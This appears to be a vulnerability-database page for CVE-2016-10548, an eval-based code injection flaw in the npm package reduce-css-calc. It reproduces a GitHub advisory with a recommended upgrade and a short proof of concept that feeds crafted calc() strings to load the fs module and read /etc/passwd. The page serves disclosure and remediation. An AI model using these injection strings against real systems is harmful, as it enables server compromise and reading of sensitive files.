CVE-2016-10548
UNKNOWN
Published 2018-05-31T20:00:00Z
Actions:
Expert Analysis
Professional remediation guidance
Get tailored security recommendations from our analyst team for CVE-2016-10548. We'll provide specific mitigation strategies based on your environment and risk profile.
No CVSS data available
Description
Arbitrary code execution is possible in reduce-css-calc node module <=1.2.4 through crafted css. This makes cross sites scripting (XSS) possible on the client and arbitrary code injection possible on the server and user input is passed to the `calc` function.
Available Exploits
No exploits available for this CVE.
Related News
No news articles found for this CVE.
Affected Products
Affected Versions:
GitHub Security Advisories
Community-driven vulnerability intelligence from GitHub
Advisory Details
Affected versions of `reduce-css-calc` pass input directly to `eval`. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server.
## Proof of Concept
```
const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc( (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc( (fs['readFileSync']("/etc/passwd", "utf-8")))`));
```
## Recommendation
Update to version 1.2.5 or later.
Affected Packages
npm
reduce-css-calc
ECOSYSTEM:
≥0
<1.2.5
CVSS Scoring
CVSS Score
9.0
References
Advisory provided by GitHub Security Advisory Database. Published: June 7, 2018, Modified: August 31, 2020
References
Published: 2018-05-31T20:00:00Z
Last Modified: 2024-09-16T20:03:43.284Z
Copied to clipboard!